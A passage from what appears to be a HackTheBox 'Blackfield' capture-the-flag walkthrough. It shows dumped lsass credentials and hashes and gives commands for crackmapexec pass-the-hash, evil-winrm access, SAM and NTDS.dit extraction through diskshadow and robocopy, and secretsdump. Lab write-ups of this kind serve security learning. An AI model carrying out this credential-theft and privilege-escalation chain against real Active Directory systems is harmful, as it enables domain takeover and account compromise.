&SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6 password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600 == WDIGEST [5eda]== username DC01$ domainname BLACKFIELD password None password (hex) == LogonSession == authentication_id 22028 (560c) session_id 0 username domainname logon_server logon_time 2020-02-23T17:57:44.959593+00:00 sid None luid 22028 == MSV == Username: DC01$ Domain: BLACKFIELD LM: NA NT: b624dc83a27cc29da11d9bf25efea796 SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d DPAPI: NA == LogonSession == authentication_id 999 (3e7) session_id 0 username DC01$ domainname BLACKFIELD logon_server logon_time 2020-02-23T17:57:44.913221+00:00 sid S-1-5-18 luid 999 == WDIGEST [3e7]== username DC01$ domainname BLACKFIELD password None password (hex) == Kerberos == Username: dc01$ Domain: BLACKFIELD.LOCAL == WDIGEST [3e7]== username DC01$ domainname BLACKFIELD password None password (hex) == DPAPI [3e7]== luid 999 key_guid 0f7e926c-c502-4cad-90fa-32b78425b5a9 masterkey ebbb538876be341ae33e88640e4e1d16c16ad5363c15b0709d3a97e34980ad5085436181f66fa3a0ec122d461676475b24be001736f920cd21637fee13dfc616 sha1_masterkey ed834662c755c50ef7285d88a4015f9c5d6499cd == DPAPI [3e7]== luid 999 key_guid f611f8d0-9510-4a8a-94d7-5054cc85a654 masterkey 7c874d2a50ea2c4024bd5b24eef4515088cf3fe21f3b9cafd3c81af02fd5ca742015117e7f2675e781ce7775fcde2740ae7207526ce493bdc89d2ae3eb0e02e9 sha1_masterkey cf1c0b79da85f6c84b96fd7a0a5d7a5265594477 == DPAPI [3e7]== luid 999 key_guid 31632c55-7a7c-4c51-9065-65469950e94e masterkey 825063c43b0ea082e2d3ddf6006a8dcced269f2d34fe4367259a0907d29139b58822349e687c7ea0258633e5b109678e8e2337d76d4e38e390d8b980fb737edb sha1_masterkey 6f3e0e7bf68f9a7df07549903888ea87f015bb01 == DPAPI [3e7]== luid 999 key_guid 7e0da320-072c-4b4a-969f-62087d9f9870 masterkey 1fe8f550be4948f213e0591eef9d876364246ea108da6dd2af73ff455485a56101067fbc669e99ad9e858f75ae9bd7e8a6b2096407c4541e2b44e67e4e21d8f5 sha1_masterkey f50955e8b8a7c921fdf9bac7b9a2483a9ac3ceed
svc_backup: 9658d1d1dcd9250115e2205d9f48400d
Administrator: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Initial Access:
- Sprayed both the NTLM hashes using crackmapexec on to the DC but found a green flag with svc_backup.
crackmapexec smb 10.10.10.192 -u "Administrator" -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
crackmapexec smb 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
- Used Evil-WinRM to get initial foothold using svc_backup hash and captured the user flag.
evil-winrm.rb -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
- I was able to peek inside the Administrator home directory but was unable to capture the root flag.
- Next, i checked the permissions for our current user and found an Interesting one enabled – SeBackupPrivilege.
whoami /all
- Also looked inside a notes.txt file in C directory which reveal some hints about performing some backup.
- Looked into the account information for user svc_backup and found that it is part of “Backup Operators” group. With SEBackupPrivilege enabled and the user being part of the Backup Operators group, we will be able to escalate our privileges by taking backup of the SAM or NTDS.dit file and then dumping password hashes from it. So, let’s perform it then.
net user svc_backup
Privilege Escalation:
- Made a directory named temp and used the registry to save a copy of the SAM and System files to our temp directory.
cd Temp reg save hklm\sam c:\Temp\sam reg save hklm\system c:\Temp\system
- Downloaded the files to our local machine. This might take a while.
- Used pypykatz to dump the contents of the SAM and system file and we got some hashes.
pypykatz registry --sam sam system
HBoot Key: 1d645695662cc2a70d54ee626104485110101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- I tried to get a shell as Administrator with the dumped hash but got denied. That means, we have to now dump the hashes from NTDS.dit file.
- Used the below commands and save it to a file name diskshadow.txt. With these commands, we are setting up a drive Z as a copy of the C drive using diskshadow and then mounting it to the filesystem.
echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append echo "create" | out-file ./diskshadow.txt -encoding ascii -append echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
diskshadow.exe /s c:\temp\diskshadow.txt
- Next, used the robocopy utility to copy the NTDS.dit file to our temp directory from our generated Z drive which holds a copy of C.
cd Z: cd windows cd ntds robocopy /b .\ C:\temp NTDS.dit
- Also saved the system.bak file to our temp directory.
cd C:\Temp reg.exe save hklm\system C:\temp\system.bak
- Downloaded both the file to our local machine. This might take a lot of time. So, go ahead and have some Kool-Aid.
- Once downloaded, used secretsdump.py to dump the contents of the NTDS file and thus got the Administrator’s password hash.
secretsdump.py -ntds ntds.dit -system system.bak LOCAL > hashes.txt
Administrator: 184fb5e5178480be64824d4cd53b99ee
- At last, used Evil-WinRM to get shell access as administrator and captured the root flag.
evil-winrm.rb -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Also Read: HTB – APT
Conclusion:
So that was “Blackfield” for you. This machine covers exploitation of Windows and Active Directory misconfigurations. Initially, Anonymous / Guest access to an SMB share was used to enumerate users. Once the user was found to have Kerberos pre-authentication disabled, we conducted an ASREPRoasting attack. This allowed us to retrieve a hash of the encrypted material contained in the AS-REP, which was then cracked via an offline brute force attack. With this user creds, we accessed a SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group were then used to dump the Active Directory database, and retrieved the hash of the primary domain administrator. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.